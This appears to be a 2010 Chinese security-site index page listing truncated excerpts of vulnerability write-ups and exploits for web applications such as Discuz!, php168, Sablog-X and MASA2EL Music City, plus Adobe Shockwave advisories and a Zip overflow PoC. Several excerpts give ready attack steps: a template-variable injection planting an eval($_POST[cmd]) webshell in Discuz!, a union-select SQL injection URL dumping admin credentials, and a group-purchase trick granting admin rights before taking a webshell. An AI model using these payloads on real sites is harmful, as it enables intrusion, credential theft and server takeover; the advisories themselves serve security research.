|
|
Discuz! 6.x/7.x 全局变量防御绕过漏洞
|
|
日期:2010-05-19 11:06:24
点击:67 评论:0
|
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞 include/global.func.php代码里: function daddslashes($string, $force = 0) { !defined('MAGIC_QUOTES_GPC') define('MAGIC_QUOTES_GPC', get_magic_quotes_g |
|
|
New Includes Function -- spl_autoload()
|
|
日期:2010-05-17 14:48:30
点击:97 评论:0
|
New Includes Function -- spl_autoload() author: ryat#www.wolvez.org team:http://www.80vul.com date:2009-04-13 一、描述 看看手册对这个函数的描述: spl_autoload (PHP 5 = 5.1.2) spl_autoload Default implementation for __autoload() void spl_autoload ( st |
|
|
当magic_quotes_gpc=off
|
|
日期:2010-05-17 14:45:33
点击:115 评论:0
|
当magic_quotes_gpc=off author: ryat#www.wolvez.org team:http://www.80vul.com date:2009-04-10 一、综述 magic_quotes_gpc是php中的一个安全选项,在php manual中对此有如下描述: When on, all ' (single-quote), (double quote), (backslash) and NULL character |
|
|
关于magic_quotes_sybase
|
|
日期:2010-05-17 14:45:09
点击:133 评论:0
|
关于magic_quotes_sybase author: ryat#wolvez.org team:http://www.80vul.com date:2009-04-14 一 描叙 magic_quotes_gpc为on时,php在注册变量时会调用addslashes()函数处理[既转义单引号、双引号、反斜线和nullbyte],但php.ini中还有另外一个选项影响着magic_quotes_ |
|
|
ZIP 文件溢出漏洞
|
|
日期:2010-05-13 10:43:33
点击:112 评论:0
|
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! ?php/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Zip Unzip v6 (.zip) 0day stack buffer overflow PoC exploitAuthor: mr_me - http://net-ninja.net/Downlo |
|
|
[CAL-20100204-3]Adobe Shockwave Player Director文件分析RCSL指针覆盖漏洞
|
|
日期:2010-05-13 10:40:47
点击:61 评论:0
|
[CAL-20100204-3]Adobe Shockwave Player Director文件分析RCSL指针覆盖漏洞 影响版本 ========= 11.5.2.602 ,11.5.6.606 and prior CVE ID: CVE-2010-1280 CAL ID: CAL-20100204-3 漏洞描述 ========= Code Audit Labs http://www.vulnhunt.com 在Adobe's Shockwave P |
|
|
[CAL-20100204-2]Adobe Shockwave Player Director文件分析整型溢出漏洞
|
|
日期:2010-05-13 10:40:06
点击:71 评论:0
|
[CAL-20100204-2]Adobe Shockwave Player Director文件分析整型溢出漏洞 影响版本 ======== 11.5.2.602 ,11.5.6.606 and prior CVE ID: CVE-2010-0129 CAL ID: CAL-20100204-2 漏洞描述 ========= Code Audit Labs http://www.vulnhunt.com 在Adobe's Shockwave Player |
|
|
[CAL-20100204-1]Adobe Shockwave Player Director文件分析ATOM size无限循环漏洞
|
|
日期:2010-05-13 10:38:31
点击:45 评论:0
|
[CAL-20100204-1]Adobe Shockwave Player Director文件分析ATOM size无限循环漏洞 影响版本 ======== 11.5.2.602 ,11.5.6.606 and prior CVE ID: CVE-2010-1282 CAL ID: CAL-20100204-1 漏洞描述 ======== Code Audit Labs http://www.vulnhunt.com 在Adobe's Shockwav |
|
|
php168 获取管理员0day
|
|
日期:2010-05-04 12:08:49
点击:229 评论:0
|
由于php168程序对用户组权限购买处理不当,使普通用户具有购买管理员权限 ,从而获得管理权限 。 漏洞利用: 1.注册普通用户 2.通过 http://www.xxx.com/member/buygroup.php?job=buygid=3 购买管理员权限 。 3.后台 拿webshell 漏洞分析 +修复方法: 需要修改到的文件 |
|
|
discuz! 7.0 及以下版本后台拿webshell
|
|
日期:2010-04-12 10:57:53
点击:159 评论:0
|
不需要创始人,只需要管理员。 http://www.fuck.com/admincp.php?action=stylesoperation=editid=1adv=1 中,最下面有个自定义模板变量,变量中填: PHP代码 OLDJUN ',' #999'); eval ( $_POST [cmd]); // 替换内容随便输入:1111,然后提交,一句话木马就产生了: htt |
|
|
新云4.0注册上传漏洞
|
|
日期:2010-03-12 10:25:04
点击:1250 评论:0
|
转自: http://hi.baidu.com/seraph1221/blog/item/2fc0f9d3ba58fdd4a9ec9afe.html 先下载一个 serawebinfo 把下面配置文件保存为(xunyun.seraph) url=http://localhost/users/upload.asp?action=saveChannelID=1sType= filefield=File1 filefield2= filename=2009816 |
|
|
网页编辑器漏洞手册(全面版)
|
|
日期:2010-03-12 10:24:18
点击:200 评论:0
|
FCKeditor FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 FCKeditor编辑器页 FCKeditor/_samples/default.html 查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command= |
|
|
科讯 v6.5 CMS Oday
|
|
日期:2010-03-12 10:22:30
点击:93 评论:0
|
后台:写入网站kesion目录如http://localhost cookies:登录后抓取到的USER的COOKIS 帐号密码:注册后可以正常登录的用户名密码 验证码:登录时的验证码,抓图后填入 操作,先输入网站,先在网站注册一个正常用户,可以直接写入帐号密码,得到验证码图片后登录后上传,也可 |
|
|
快客电邮(QuarkMail)最新远程漏洞
|
|
日期:2010-03-08 10:31:44
点击:177 评论:2
|
漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案(该产品的主要客户名单http://www.ipmotor.com/cases/cases.html), 其webmail部分使用perl cgi编写,近日笔者在渗透测试过程当中发现一处严重的安全 |
|
|
鼎峰企业智能建站系统注入搜索注入漏洞分析与利用
|
|
日期:2010-03-05 12:21:59
点击:69 评论:0
|
作者: L4nk0r[莫ㄨ问] 昨天利用这个系统拿了一个webshell,但是是利用下载默认数据库的,后面发现者这套系统界面搞得还不错,就顺便看下它的安全性了。本文就其搜索注入漏洞简单分析和利用,及批量拿shell。 一.简单分析 漏洞文件:zm_search.asp代码如下 t=Request.F |
|
|
搜狗浏览器“页面欺骗”漏洞
|
|
日期:2010-03-01 12:55:29
点击:76 评论:0
|
搜狗浏览器版本 :1.4.0.418(正式版) 漏洞成因 :在搜狗浏览器中,window.location和document.write两个函数发生条件竞争阻塞。window.location函数使URL中显示到一个地址域,同时页面元素却可以被document.write函数所改写。这样导致攻击者可以篡改页面,来实施钓鱼欺 |
|
|
远程包含和本地包含漏洞的原理
|
|
日期:2010-03-01 12:54:44
点击:60 评论:0
|
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是远程文件包含漏洞?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这 |
|
|
Sablog-X 2.X 后台管理权限欺骗漏洞
|
|
日期:2010-02-25 16:49:28
点击:48 评论:0
|
Sablog-X 2.X 后台管理权限欺骗漏洞by Ryat[puretot]mail: puretot at gmail dot comteam: http://www.80vul.comdata: 2010/2/24一 描叙:由于Sablog-x v2.x的后台认证过程存在严重的逻辑问题,导致构造特殊的cookie直接登录后台。二 分析 :// cp.phpif (!$sax_uid || |
|
|
Sablog-X v2.x 任意变量覆盖漏洞
|
|
日期:2010-02-22 11:24:24
点击:60 评论:0
|
Sablog-X v2.x 任意变量覆盖漏洞author: 80vul-Bteam:http://www.80vul.com一 描叙:由于Sablog-x v2.x的common.inc.php里 ___FCKpd___0 EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。二 分 |
|
|
MASA2EL Music City v1.0远程注入漏洞+利用代码
|
|
日期:2010-02-08 10:45:17
点击:69 评论:0
|
google: Powered By : MASA2EL Music City 1.0 Exploit:http://server/path/index.php?go=singerid=-13/**/union/**/select/**/1,concat(UserName,0x3a,PasSword),3,4/**/from/**/masa2el_admin-- |
|
|
|
|
本月热点文章 |
|
|
|
|
|
本月推荐文章 |
|
|
|
|
|
相关分类 |
|
|
|
|